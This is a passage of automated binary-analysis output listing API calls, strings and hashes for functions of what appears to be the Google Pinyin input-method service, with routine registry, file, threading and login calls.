                                                                                                                                                                      • Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
                                                                                                                                                                      • Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow_sprintf
                                                                                                                                                                    • String ID: %.1f$1$5$CHECK failed: (size) <= (6): $CHECK failed: (temp[0]) == ('1'): $CHECK failed: (temp[size-1]) == ('5'):
                                                                                                                                                                    • API String ID: 3189710002-2954466161
                                                                                                                                                                    • Opcode ID: aa18c1ca606d58f85d74b9de2693819935c6a93320ff13334b547cbf36c1ec46
                                                                                                                                                                    • Instruction ID: d49f8d720bac5f902cfb39332b85bbff5cd6531c2e5330614fa27faed3947a52
                                                                                                                                                                    • Opcode Fuzzy Hash: aa18c1ca606d58f85d74b9de2693819935c6a93320ff13334b547cbf36c1ec46
                                                                                                                                                                    • Instruction Fuzzy Hash: E28188B09083809FD320CF2AC991B5BBBE5FF95704F404A2EF49547292D7B99909CF96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0045B92A
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0045B97E
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0045BA42
                                                                                                                                                                    Strings
                                                                                                                                                                    • https://clients2.google.com/accounts/ClientLogin, xrefs: 0045B8F2
                                                                                                                                                                    • application/x-www-form-urlencoded, xrefs: 0045B90C
                                                                                                                                                                    • Content-Type, xrefs: 0045B911
                                                                                                                                                                    • POST, xrefs: 0045B8F7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocClearFreeVariant
                                                                                                                                                                    • String ID: Content-Type$POST$application/x-www-form-urlencoded$https://clients2.google.com/accounts/ClientLogin
                                                                                                                                                                    • API String ID: 1665868789-1274363211
                                                                                                                                                                    • Opcode ID: 6c65e130c25744d375fc7171ecaeca4744fa1b5066e6619412fbf0d6699bdebd
                                                                                                                                                                    • Instruction ID: b87d6fed2f0624c32a333056f05a89e4f3eff91c628947b4119a8fbf684584a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c65e130c25744d375fc7171ecaeca4744fa1b5066e6619412fbf0d6699bdebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 567165B12047408FD314CF2DC885A16BBE5FFD9324F148A5DE5588B3A1DB35E80ACB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004272AD
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    • _memmove.LIBCMT ref: 00427324
                                                                                                                                                                    • _memmove.LIBCMT ref: 0042733E
                                                                                                                                                                    • _memmove.LIBCMT ref: 0042739D
                                                                                                                                                                    • _memmove.LIBCMT ref: 00427403
                                                                                                                                                                    • _memmove.LIBCMT ref: 0042741F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    • API String ID: 4034224661-3788999226
                                                                                                                                                                    • Opcode ID: bdf7eef3f265949d938d52b41eed6cbadedc06682690cd3f396b10aa675d0aaa
                                                                                                                                                                    • Instruction ID: 160d991f1764335dc60e2d88b0186a35470c0cfab16797eb0c0b54c99988bde2
                                                                                                                                                                    • Opcode Fuzzy Hash: bdf7eef3f265949d938d52b41eed6cbadedc06682690cd3f396b10aa675d0aaa
                                                                                                                                                                    • Instruction Fuzzy Hash: 5951C0727042128FC704DF29DC8582AB7E5EFC4314B488A6EFD45CB349EA38E909C7A5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 004C33D5
                                                                                                                                                                      • Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,09D48295,00000000), ref: 004C330F
                                                                                                                                                                      • Part of subcall function 00401590: RegCloseKey.ADVAPI32(00000000,00403512,?,?,?,?,?,?,?,?,?,?,?,00510206,000000FF), ref: 00401597
                                                                                                                                                                      • Part of subcall function 004C7B10: RegCloseKey.ADVAPI32(?,004C4AED,00000000,00512DA0,000000FF,004C280F,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C7B1E
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,09D48295,00000000), ref: 004C3329
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: %s\%s$RLSs$Software\Google\Common\Rlz$rls
                                                                                                                                                                    • API String ID: 3535843008-4233612992
                                                                                                                                                                    • Opcode ID: 764c7bc56de5e174c088bd451c3f9eed29b096ce54e0fee5b09b9ba595a42960
                                                                                                                                                                    • Instruction ID: 8e0a0fad730a746c6dc02a7c845cc33285a698e88830f99371e0f80be6d89668
                                                                                                                                                                    • Opcode Fuzzy Hash: 764c7bc56de5e174c088bd451c3f9eed29b096ce54e0fee5b09b9ba595a42960
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C418D792083408BC704DF15D881B9BB7E4FB88714F444D2EF84593291DB7DEA498BA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00020019,?,?), ref: 00456470
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32 ref: 00456499
                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 004564A3
                                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004564B6
                                                                                                                                                                    Strings
                                                                                                                                                                    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00456466
                                                                                                                                                                    • User Agent, xrefs: 0045648B
                                                                                                                                                                    • Mozilla/4.0 (compatible; Win32), xrefs: 00456423
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open$CloseInternetQueryValue
                                                                                                                                                                    • String ID: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings$Mozilla/4.0 (compatible; Win32)$User Agent
                                                                                                                                                                    • API String ID: 88576721-3817825068
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0045423C
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104), ref: 0045424D
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00454262
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0045426C
                                                                                                                                                                    • _memset.LIBCMT ref: 00454291
                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,GU-,00000000,?), ref: 004542AD
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Temp_memset$CreateDirectoryErrorFileLastNamePath
                                                                                                                                                                    • String ID: GU-
                                                                                                                                                                    • API String ID: 3251621297-143111987
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32,?,?,?,?,?,?,?,?,?,?,0041386C,?,?,00000010), ref: 004115B9
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004115DB
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 004115EC
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004115F6
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressCurrentFreeLoadProcProcess
                                                                                                                                                                    • String ID: IsWow64Process$kernel32
                                                                                                                                                                    • API String ID: 3066816673-3789238822
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00455404
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 00455482
                                                                                                                                                                    • _memset.LIBCMT ref: 004554E1
                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000001,00000000,00000003,00000000,00000000), ref: 0045555C
                                                                                                                                                                    • GetFileSize.KERNEL32 ref: 0045557B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00455593
                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00455605
                                                                                                                                                                    • _memset.LIBCMT ref: 00455629
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File_memset$CloseCreateDeleteHandleSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1401969099-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,09D48295), ref: 0046D63F
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0046D673
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 0046D775
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?), ref: 0046D86D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Type appears to be in generated pool but wasn't , xrefs: 0046D81F
                                                                                                                                                                    • registered: , xrefs: 0046D82F
                                                                                                                                                                    • File appears to be in generated pool but wasn't registered: , xrefs: 0046D71E
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: File appears to be in generated pool but wasn't registered: $Type appears to be in generated pool but wasn't $registered:
                                                                                                                                                                    • API String ID: 3168844106-1304342697
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F598
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F5B4
                                                                                                                                                                    • _malloc.LIBCMT ref: 0045F605
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0045F687
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000404,?,00000000), ref: 0045F6A6
                                                                                                                                                                    • _memmove.LIBCMT ref: 0045F6D3
                                                                                                                                                                    • _free.LIBCMT ref: 0045F730
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Pointer$Read_free_malloc_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2793708502-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0041D593
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    • _memmove.LIBCMT ref: 0041D5DF
                                                                                                                                                                    • _memmove.LIBCMT ref: 0041D5F3
                                                                                                                                                                    • _memmove.LIBCMT ref: 0041D60A
                                                                                                                                                                    • _memmove.LIBCMT ref: 0041D64F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    • API String ID: 4034224661-3788999226
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 0050D59D
                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0050D5C7
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0050D5D5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8OffsetThrowstd::bad_exception::bad_exception
                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                    • API String ID: 1176828985-2956939130
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00405268
                                                                                                                                                                      • Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE3F0
                                                                                                                                                                      • Part of subcall function 004EE3DB: __CxxThrowException@8.LIBCMT ref: 004EE405
                                                                                                                                                                      • Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE416
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004052A3
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    • _memmove.LIBCMT ref: 0040530D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                                                                    • String ID: GooglePinyinService.exe$invalid string position$string too long
                                                                                                                                                                    • API String ID: 1615890066-443506558
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00000025,00402C29,?,00000000), ref: 00402239
                                                                                                                                                                      • Part of subcall function 004050F0: lstrcmpiW.KERNEL32(?,00000000,?,?,?,0040224C,00000000,?,00000000,00000025,00402C29,?,00000000), ref: 0040510E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,00000000,?,00000000,00000025,00402C29,?,00000000), ref: 00402254
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,00000000,?,00000000,00000025,00402C29,?,00000000), ref: 00402272
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$Leave$Enterlstrcmpi
                                                                                                                                                                    • String ID: %),@
                                                                                                                                                                    • API String ID: 431788158-3470382913
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenFileMappingW.KERNEL32(00000002,00000000,GPY2SETTINGS,00000000,?,?,?,0040DF77), ref: 0041167E
                                                                                                                                                                      • Part of subcall function 004112A0: _memset.LIBCMT ref: 004112C0
                                                                                                                                                                      • Part of subcall function 004112A0: GetVersionExW.KERNEL32 ref: 004112D4
                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000190,GPY2SETTINGS,?,?,?,0040DF77), ref: 004116CF
                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,0040DF77), ref: 004116E4
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0040DF77), ref: 004116EA
                                                                                                                                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,?,?,?,?,0040DF77), ref: 00411722
                                                                                                                                                                      • Part of subcall function 00412F90: GetCurrentProcess.KERNEL32(00000008,?,09D48295,00000000,?,00000000), ref: 00412FEB
                                                                                                                                                                      • Part of subcall function 00412F90: OpenProcessToken.ADVAPI32(00000000), ref: 00412FF2
                                                                                                                                                                      • Part of subcall function 00412F90: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00413035
                                                                                                                                                                      • Part of subcall function 00412F90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413045
                                                                                                                                                                      • Part of subcall function 00412F90: HeapFree.KERNEL32(00000000), ref: 0041304C
                                                                                                                                                                      • Part of subcall function 00412F90: CloseHandle.KERNEL32(00000000), ref: 00413057
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileProcess$FreeHeapMappingOpen$CloseConvertCreateCurrentErrorHandleLastLocalStringTokenVersionView_memset
                                                                                                                                                                    • String ID: GPY2SETTINGS
                                                                                                                                                                    • API String ID: 2326875920-1141039874
                                                                                                                                                                    • Opcode ID: 4ff60fdcd90750f3071c05f73c1befe2edf52e0ba5139bc3945f3b4063665ee1
                                                                                                                                                                    • Instruction ID: 1509bcbef776abc818122a77030b68c261ff33ba7b001624027d85aa69127cd6
                                                                                                                                                                    • Opcode Fuzzy Hash: 4ff60fdcd90750f3071c05f73c1befe2edf52e0ba5139bc3945f3b4063665ee1
                                                                                                                                                                    • Instruction Fuzzy Hash: C521BF74600701AFE3209F29CC05B4BBBE0AFD1710F54C92EF569C63A0D778E4448B5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateJobObjectW.KERNEL32 ref: 004DD389
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000009,?,00000070), ref: 004DD395
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorLastObject
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4248079190-0
                                                                                                                                                                    • Opcode ID: aefc0d636a85021c79174f1acbfd9707e3bdbdbbeb986d90b924bb95a8f15cb0
                                                                                                                                                                    • Instruction ID: a2c3280cf6b41bef33a1c93c027834e196ea18f2ffe76ca49ddf35b9ee418cb1
                                                                                                                                                                    • Opcode Fuzzy Hash: aefc0d636a85021c79174f1acbfd9707e3bdbdbbeb986d90b924bb95a8f15cb0
                                                                                                                                                                    • Instruction Fuzzy Hash: 692194756083019FE320DF26DC52FABB7E4BF98705F40481EB689862D0DB799408CB97
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000004,00001388,?,00000000,00420552,09D48295,00000007,?,00000000), ref: 0046187F
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0046188E
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00461898
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618A7
                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618B7
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618BE
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalMutexObjectReleaseSectionSingleWait$EnterEventLeaveReset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2242600547-0
                                                                                                                                                                    • Opcode ID: 0a0f7eafa2fdadbc9ac8ab9d9296540b5b8c11878dd6768fa4a54827db15c95b
                                                                                                                                                                    • Instruction ID: 421bd33604f49ddef9562eebca4294a3aa0cbd6969fba6712d81f86565da5362
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a0f7eafa2fdadbc9ac8ab9d9296540b5b8c11878dd6768fa4a54827db15c95b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF03176500B019FC7309BA5DC88D67B7F8BFA9351304481DF545C3620D734E846DB24
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040D8C7
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040D8FE
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040D97E
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000), ref: 0040DA69
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 0040DA70
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040DA87
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Current$Process$CloseCreateFileHandleQueryThreadVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2824296062-0
                                                                                                                                                                    • Opcode ID: d4749db79e9684bf582b97681789aae3ca033e23cf7176db35f38d2e736985d9
                                                                                                                                                                    • Instruction ID: c4c7a1ac73d950067c95b8c86b82b60a122b47cbf9920de9c753e596b953d095
                                                                                                                                                                    • Opcode Fuzzy Hash: d4749db79e9684bf582b97681789aae3ca033e23cf7176db35f38d2e736985d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A7146B5A083409FD724CF65C880B9BBBE5BFD9700F048A2EF99993390D7749909CB56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
